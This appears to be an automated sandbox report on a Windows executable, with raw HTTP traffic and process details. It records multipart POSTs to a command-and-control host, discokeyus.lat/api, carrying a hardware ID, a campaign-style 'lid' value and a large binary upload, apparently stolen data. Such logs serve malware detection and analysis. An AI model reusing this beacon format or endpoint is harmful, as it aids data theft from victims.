2024-12-20 15:55:57 UTC | 4590 | OUT | Data Raw: 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: ?2+?2+?o?Mp5p_oI
2024-12-20 15:55:58 UTC | 1127 | IN | HTTP/1.1 200 OK
    Date: Fri, 20 Dec 2024 15:55:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=n4dpedq7e3rjnt30pp7124amt5; expires=Tue, 15 Apr 2025 09:42:36 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckioE6fXOAaAUJEs9yvj72IkwPhGPpAlWaa8yUztPTTdnx8ma281lQQsuukZorMF4hUpDxTaGNNj69gqaQv%2FhViq95ZTq9c6AeqUiXOiFR6Pcd16NYGImJFTycF0%2FArhzg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f50d1d35ce38c1b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2020&rtt_var=783&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2832&recv_bytes=20874&delivery_rate=1374764&cwnd=210&unsent_bytes=0&cid=9131cd27aacfb106&ts=961&x=0"
2024-12-20 15:55:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-20 15:55:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49726 | 104.21.21.99 | 443 | 828 | C:\Users\user\Desktop\NAliwxUTJ4.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:56:00 UTC | 273 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=861PTFRQQ7MW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1217
    Host: discokeyus.lat
2024-12-20 15:56:00 UTC | 1217 | OUT | Data Raw: 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 36 31 50 54 46 52 51 51 37 4d 57 0d 0a
    Data Ascii: --861PTFRQQ7MWContent-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--861PTFRQQ7MWContent-Disposition: form-data; name="pid"1--861PTFRQQ7MWContent-Disposition: form-data; name="lid"PsFKDg--pablo--861PTFRQQ7MW
2024-12-20 15:56:01 UTC | 1120 | IN | HTTP/1.1 200 OK
    Date: Fri, 20 Dec 2024 15:56:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=d3t8a5k6s3c20ubsb81g34br8k; expires=Tue, 15 Apr 2025 09:42:39 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S97fX7OdnMwNIF6Fp4n1pb7IcDhsyBWLdpqbGksCqQPu3fLnBt62BP7rplzOP72SFK33qxghKxELKtd8wIhv79kJfQXBcPyHfVxhl1LFc1TgAHxRqX4zEx7w3l2NztX5ww%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f50d1e738bf8ca7-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2010&rtt_var=766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2126&delivery_rate=1416787&cwnd=128&unsent_bytes=0&cid=5b4fe410615a1532&ts=800&x=0"
2024-12-20 15:56:01 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-20 15:56:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49729 | 104.21.21.99 | 443 | 828 | C:\Users\user\Desktop\NAliwxUTJ4.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 15:56:03 UTC | 278 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QIGSWE36PS2VX4N
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 552861
    Host: discokeyus.lat
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: 2d 2d 51 49 47 53 57 45 33 36 50 53 32 56 58 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 35 44 30 44 42 32 33 44 45 44 41 44 37 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 49 47 53 57 45 33 36 50 53 32 56 58 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 49 47 53 57 45 33 36 50 53 32 56 58 34 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 51 49 47 53 57
    Data Ascii: --QIGSWE36PS2VX4NContent-Disposition: form-data; name="hwid"CA5D0DB23DEDAD70AC8923850305D13E--QIGSWE36PS2VX4NContent-Disposition: form-data; name="pid"1--QIGSWE36PS2VX4NContent-Disposition: form-data; name="lid"PsFKDg--pablo--QIGSW
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: 43 44 b2 ce 38 b2 ba a6 ef 38 9e 9d 1c 3a 36 8f a4 c9 ea 8d cb a6 2f b0 e0 2b 8d 66 08 dc 1c c2 fd df 2b 81 54 df f1 61 ac a8 ca 89 7b fe 43 d2 f4 3c 80 3a ce ed ac 87 7f ce c8 f8 08 14 ef d9 80 0d 6d 5c 98 cf 56 d1 62 d5 68 e5 2f 23 4d e7 b9 5a 34 c5 88 e0 78 1d 5a 19 a4 9d e3 0e 65 34 71 db dc 3d 05 af be c1 f7 31 0c 36 12 e7 ea 0d 66 37 2a c5 56 55 26 0d 2b 06 cd 1d 1f ac 38 cc 9a 92 99 19 58 58 7a 49 6b f2 dd 22 f0 db 41 33 c6 05 09 81 89 1e 34 7b 43 77 30 58 ed 50 68 91 92 1d 44 1e fe 34 f0 3d b9 79 73 d8 c4 ed 05 ef dc 6a c0 f9 46 59 ea 0b 2a c5 13 fd 7a 8b 26 d4 d8 53 34 34 da 26 91 d0 15 ca 94 5d 3a cd ce a4 69 86 74 86 12 f8 e3 7a 98 69 55 ee 93 8a 8d 56 c0 c5 f3 02 49 63 47 94 f9 57 96 92 e9 89 07 c0 04 78 69 9e 84 24 79 78 97 b8 9c 7f fa 61 80
    Data Ascii: CD88:6/+f+Ta{C<:m\Vbh/#MZ4xZe4q=16f7*VU&+8XXzIk"A34{Cw0XPhD4=ysjFY*z&S44&]:itziUVIcGWxi$yxa
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: e9 8f e9 a4 ad 75 a1 3b 39 bf d2 c2 57 48 c3 f5 a8 d1 4b c0 fa 2e 15 3f 8d 5f 92 fd 5d 44 3c e9 ec 30 ad 3c a4 f2 d4 96 9a 05 27 0e de 65 dd f7 a6 a9 a3 6a 8c 63 fc ae f8 f0 f0 a3 97 f2 9a 75 40 af 5c a4 fc fc d9 2c 37 d5 ea 2b b3 e6 4c 93 da ea 2f 4f 74 af a2 cc 4a 10 df ea 4c 72 a9 9a 5c 78 12 99 ae 9e c8 bb 49 ea 83 bf d8 ce b2 2d 3d f9 57 be e0 54 32 d2 d6 2c 3f 92 3b 26 9d 4a 0d df 87 75 57 66 fa f7 6f 5c d3 40 6d 53 3b bd b5 81 1f fa c9 7d c2 51 77 df 71 8d 8a 89 ce 89 78 dd 81 94 cd 69 57 ca 51 c6 f2 14 e3 f8 5c e5 8d 73 65 6e 5f 3e 24 40 2c d1 8f 9b 5b 2b 3d 46 7f 4e 94 1e d8 67 65 6d b2 76 99 b0 59 c5 19 5e 6c d3 70 62 c5 b1 7f 8a fd e5 b0 61 7a b2 b3 82 24 33 f7 11 15 12 57 5a 0c 05 1d 49 fc 15 b2 52 ea 13 b4 be e2 23 a3 cd 1a 14 76 5d db 45 1f
    Data Ascii: u;9WHK.?_]D<0<'ejcu@\,7+L/OtJLr\xI-=WT2,?;&JuWfo\@mS;}QwqxiWQ\sen_>$@,[+=FNgemvY^lpbaz$3WZIR#v]E
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: 97 b1 60 0a d5 61 e3 d9 b1 59 cf 72 a7 3b 2a cb 67 e3 f2 b2 89 91 e7 1c 75 21 a9 cd 7d 60 ec 11 1d c6 4f 81 fc 73 2b 24 dd 5b 43 7f d8 da 79 5d e7 2b ef bb ca 7a 39 0c 79 3f 90 d8 b8 1b 47 4f f8 f4 98 64 d0 b5 49 39 1a 4d ab a8 47 d0 ff 0a 7a 89 bf fe 98 70 ef 0f c0 b9 b6 32 e6 79 cb b9 fc ec 12 3f b4 ed cf 9e 37 ce 19 b6 e9 bb 11 96 c0 79 b9 4f d2 ec 38 7a b4 e1 4b d8 f4 56 01 0e 97 88 b3 30 a2 13 ec fa 33 72 e8 97 e7 0d 73 56 a4 be 36 ef 79 dc fd 88 78 55 84 eb d7 52 bd 14 5c 51 33 f8 f6 1e ab b7 7c 55 21 be 2e b4 7c 74 dd 75 e3 44 6f d8 44 94 0e d5 0d b1 1f bb 5a 00 9d fd 12 5d ba d9 db b4 73 61 82 56 17 21 c3 4f 5f a9 f6 95 15 b8 c9 32 30 af b5 af fe b8 b0 f1 5f e1 9c 7d 6e d8 2d 6f 1e 86 80 15 ae 99 a8 cb ec 80 24 5f 28 99 b7 d6 97 fb ed c7 d3 5e 9a
    Data Ascii: `aYr;*gu!}`Os+$[Cy]+z9y?GOdI9MGzp2y?7yO8zKV03rsV6yxUR\Q3|U!.|tuDoDZ]saV!O_20_}n-o$_(^
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: 8e 3c d4 2c 45 9b e4 10 1a 9a 11 d7 f7 4a 5a 57 57 6f 99 75 ea 7a 35 35 4b f9 6c 8c 2c b6 23 70 be 9b 47 97 7f fe 12 0c 27 3a 14 b4 39 55 b4 b8 e4 c5 09 ad 4c 34 1b 1e a8 20 68 70 69 90 73 fd 37 e2 da 9d 19 3e a6 7c d4 66 db 89 f9 09 fc 60 30 17 43 fe 87 41 e7 d7 89 2b 0a 57 26 3a 3d dd 53 1e 1e 5c d8 b9 43 d0 49 42 87 a3 42 a4 f9 fd 58 99 75 1c 3e 4b bb f4 07 dc 48 20 2c 8e 58 14 da 2a 12 a3 24 4b aa e7 ae 09 0e be 68 44 9f 69 19 f9 b1 63 f5 44 1d d5 6d 66 53 7f 4d 10 1d 50 b4 31 f0 67 9e 1b 33 85 ab 35 60 e0 43 4d e7 90 fe 7a 31 e6 01 e6 66 8a 4e 19 c5 90 eb 6c 57 f3 46 81 80 91 ef ce 3b 38 d1 48 4f e5 37 27 a7 ab ac 33 1a 89 cd d0 5e c9 8e 86 f9 59 66 10 d5 a7 e4 76 7f 52 62 02 fc c0 a0 22 e0 07 6e 44 b0 42 eb f0 d9 ea 13 f2 b3 9d e7 e9 66 0c f1 db bf
    Data Ascii: <,EJZWWouz55Kl,#pG':9UL4 hpis7>|f`0CA+W&:=S\CIBBXu>KH ,X*$KhDicDmfSMP1g35`CMz1fNlWF;8HO7'3^YfvRb"nDBf
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: a0 8f 31 24 14 46 19 1e 1f 7a d9 43 71 02 01 ee 17 1d f3 73 1d 2e 54 8c 39 77 03 f5 ec b2 15 77 02 a1 43 79 56 26 ea d4 2d b7 92 8a e5 c4 17 72 dd f6 21 b5 b7 d6 dd 17 0a c5 1e 68 7f 53 c7 dd dd 1d 86 bb c4 5e fe 12 26 2f 3e ff d7 58 ac c9 a0 df 6d 1d 8e df db ff c6 b0 9e 98 f7 03 9f 34 ac db 61 50 f7 5a 66 70 7d f7 80 a6 35 56 fb 02 20 1d 44 e8 3f 05 a4 1e ff d9 cd f1 8d 4f 3c 21 05 eb e5 d6 e5 b3 05 ef 97 06 ac a3 11 40 6c 7a 4d 58 aa f9 64 d8 9b bd af 65 80 39 5c a2 e0 ec 3e f7 23 fd c6 7b ca ce a9 cc 5e 05 7f 0c 10 1b f3 5d b1 90 c2 f2 41 44 74 68 51 ae fe e8 75 25 38 46 3d f0 09 ad 2d 08 6c 19 66 0d d6 97 17 8d f2 c8 03 21 a5 57 51 dc 7a a9 6b 12 0f 51 5f d3 57 9e d7 f7 e1 e1 e0 7e 9a eb e2 01 5a 29 24 34 c3 6f 64 28 c3 e1 0f 33 d6 42 aa 73 05 88 cf
    Data Ascii: 1$FzCqs.T9wwCyV&-r!hS^&/>Xm4aPZfp}5V D?O<!@lzMXde9\>#{^]ADthQu%8F=-lf!WQzkQ_W~Z)$4od(3Bs
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: 68 9d 9b d3 47 52 bc 01 0e 2e 40 1a 30 24 3b 0a b9 1a bb 36 d1 10 82 d5 f8 a1 00 13 61 31 89 b7 76 4b f6 55 73 ff 65 1c 3f 71 b4 51 5c ea b9 64 8e 7a 9d 04 df 04 44 23 1d d1 c7 80 89 56 be 16 e4 dd c8 b0 3b ea b4 d2 43 e5 77 96 75 27 bf 64 1d 68 6f 63 15 91 6e 1e 89 9f af fc 11 6a 50 a8 b9 1b 0d c7 21 f5 50 eb 22 4c 11 ac 79 fc 4a d9 65 47 6a 8f 78 0e 39 a1 ed 4f 4d dd 0a 84 f6 f5 17 bc c9 30 11 26 00 d3 b9 59 c3 49 ec 56 e8 b3 6d 2b 9a c7 30 3c c3 77 96 84 b5 9d f2 58 fe 2f 8f 50 5f 6b 30 e9 23 d8 74 bb 67 24 5a 1b e7 12 e9 28 81 b8 36 12 ad 8b 08 ee cb f8 37 8c 48 46 b5 b1 fb af ee 6b 63 17 bd c6 ab 55 22 c4 65 94 0d 87 f4 bd 53 91 b7 80 7f 39 a2 03 c2 9a 47 06 f4 7f f3 82 84 5a b1 af ec 0a d3 da d8 11 40 66 b9 e8 7a f2 7d 8c 54 4c bf 8f c0 a0 cc a1 cb
    Data Ascii: hGR.@0$;6a1vKUse?qQ\dzD#V;Cwu'dhocnjP!P"LyJeGjx9OM0&YIVm+0<wX/P_k0#tg$Z(67HFkcU"eS9GZ@fz}TL
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: 77 58 6b c5 27 01 64 d5 eb d5 d3 a7 7d 9b 02 ee dc ec 2c af 62 d0 8b 1d c9 9d 89 b1 a2 71 c8 da 0b 44 03 62 61 d9 cb 0b 9b 7d c7 44 2c 3b 8c 8e 56 79 6f 4d d6 2c 4a 0a 36 05 69 96 88 d8 eb 6c b1 0d e9 88 4f e3 a5 a3 d5 7a 61 ba 9c 79 fb bf ec 0e d5 dc 4f e7 5e 45 17 fd f5 35 48 e8 ef 5a ce bc a0 92 c2 02 6e 5f 9f c4 e5 62 e5 60 75 d6 c2 d1 b6 97 a7 cb e7 17 9b 38 27 96 db 09 9a 6c 85 a5 a2 9f e9 9b db 96 11 9a 7c 66 1d 6c d9 e7 a1 8b 1a 61 1a 83 e1 c2 cc ab a7 c5 44 c7 3a a6 e9 09 9e 57 84 de 37 ba de 74 ea 13 da b9 7d 06 f4 33 d7 57 fe b7 e4 41 5e 3e ec 6c fb 07 ba 8f 10 31 60 fb dc fc 3e 5b 55 c7 73 47 f8 b3 03 ed 67 d7 36 f3 4e e0 fc 90 4a 6d 02 e3 43 b4 4e 2c ea 44 91 c0 d1 97 d6 07 77 f1 ae 20 f5 04 85 a0 2a 0b 8a 3a 2a a5 00 68 05 f3 68 d0 6e 9a 7c
    Data Ascii: wXk'd},bqDba}D,;VyoM,J6ilOzayO^E5HZn_b`u8'l|flaD:W7t}3WA^>l1`>[UsGg6NJmCN,Dw *:*hhn|
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: d6 87 f0 b3 d7 a2 6d 12 a3 09 5d f2 87 bc c8 33 a9 7c 69 72 5a 31 34 d5 43 dc 8d f0 54 f3 1a e0 d5 1a 34 f9 09 11 8e df 5b e6 d5 fd ee 5b f8 ce 5c 8b c4 ae b7 0a c7 8e f9 82 44 a6 a4 1f 38 25 7b b4 d6 dc 02 ae 08 74 bb 4f 52 ef 09 dd fb 26 a6 a6 b2 ad 7c 37 ff 3a cf fd 27 81 3b 25 0d 54 e7 9b 62 d1 2d 4a d9 d1 f8 07 6c 8b b3 3a 49 5f d4 82 da 6a 24 04 64 9e 9c b5 e3 4c 8f 5f 1d 81 fe e6 1e 91 73 2f 00 ff 82 f4 92 0a 8c 5b 18 14 d3 aa fe fa b9 1d fd 60 f8 0a f8 71 e9 f7 ea 33 b3 cb 8e c0 e8 18 2c 19 12 4f ef dd 39 64 80 e4 a0 23 2b a7 56 4f fd 6c 40 32 ca c4 b1 1c 5a 40 e7 d5 94 c5 1e 92 b2 22 b0 af cd 65 d8 cf 56 bf b1 bd 1b d2 7a e3 89 4a c7 51 7a 06 ae 39 bf 78 b0 f3 57 91 c2 09 a8 7a ed 83 d7 cd 56 3f 83 4c 1d d9 69 1b e9 4d 17 2a 28 7e d1 98 30 ed 12
    Data Ascii: m]3|irZ14CT4[[\D8%{tOR&|7:';%Tb-Jl:I_j$dL_s/[`q3,O9d#+VOl@2Z@"eVzJQz9xWzV?LiM*(~0
2024-12-20 15:56:03 UTC | 15331 | OUT | Data Raw: e6 75 2d 3c 8b a4 ce bc a3 6f b7 25 78 a4 55 65 fd f4 68 c0 f6 8c ac 1b bd 9e 1b 52 7a f1 ac 80 cd 2b da a6 7b 28 49 90 b6 7f 37 44 79 7f 76 a6 e1 67 8b d0 8a 06 c0 90 f7 fd 02 d9 e2 fb a9 70 ff 65 8f aa 74 6b ab 7d b0 1f 09 d7 74 91 bb 17 a9 4f 20 f4 86 4d 0a 6d 44 1d 77 fc ea f5 09 93 51 df 49 35 1d 6a 92 a7 8d 87 12 67 e7 75 7a 23 e2 84 5c b0 17 35 19 71 ac 9d 83 39 d7 dc 45 d7 28 f6 4d 47 95 a1 cd 0d 9e ad 49 5f f0 ce 9e 3d ed 79 f3 d3 0c 09 52 ca fa cf f6 7b fe b3 7e f9 37 66 5f f2 87 7b 9c f8 73 8d 61 b5 36 8c 16 5e aa 9f 9d 28 76 bc 6a 86 c6 ec e7 61 a8 eb fd 29 2e eb 59 b3 2f fd ee 28 c1 d4 80 c1 07 be 23 cf e6 fc 88 ab 44 ea 9c ae 2b 1b e6 74 d6 60 7a 9b 2a 29 5f 0c da a8 0b b7 cc 7a 46 6c f9 95 21 dc 2c 8c 59 a0 4b 8a 68 90 6d 8a 78 32 cc 74 47
    Data Ascii: u-<o%xUehRz+{(I7Dyvgpetk}tO MmDwQI5jguz#\5q9E(MGI_=yR{~7f_{sa6^(vja).Y/(#D+t`z*)_zFl!,YKhmx2tG
2024-12-20 15:56:06 UTC | 1135 | IN | HTTP/1.1 200 OK
    Date: Fri, 20 Dec 2024 15:56:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=feekg0heu65r95ujvrhkoojhrk; expires=Tue, 15 Apr 2025 09:42:45 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sH91xF5abTBMuTyaaRbP0FRQFmOSOkp76kyq%2FJcJArhQosKncHPNezc7Y1oMQKj9n5tLGNOoH6CPZrQy%2F7etFAoy26uDrQln5X9FPoJzOroMc6mspug4ZQPME%2BTLVz%2FSng%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f50d1f81da943e0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2211&rtt_var=841&sent=284&recv=574&lost=0&retrans=0&sent_bytes=2832&recv_bytes=555359&delivery_rate=1292035&cwnd=247&unsent_bytes=0&cid=07fd9046f1bbcb00&ts=3900&x=0"


                                                                                                              Target ID:1
                                                                                                              Start time:10:55:39
                                                                                                              Start date:20/12/2024
                                                                                                              Path:C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\NAliwxUTJ4.exe"
                                                                                                              Imagebase:0x3e0000
                                                                                                              File size:1'861'120 bytes
                                                                                                              MD5 hash:0A678F4E43E83079C1E95517F576A88D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true
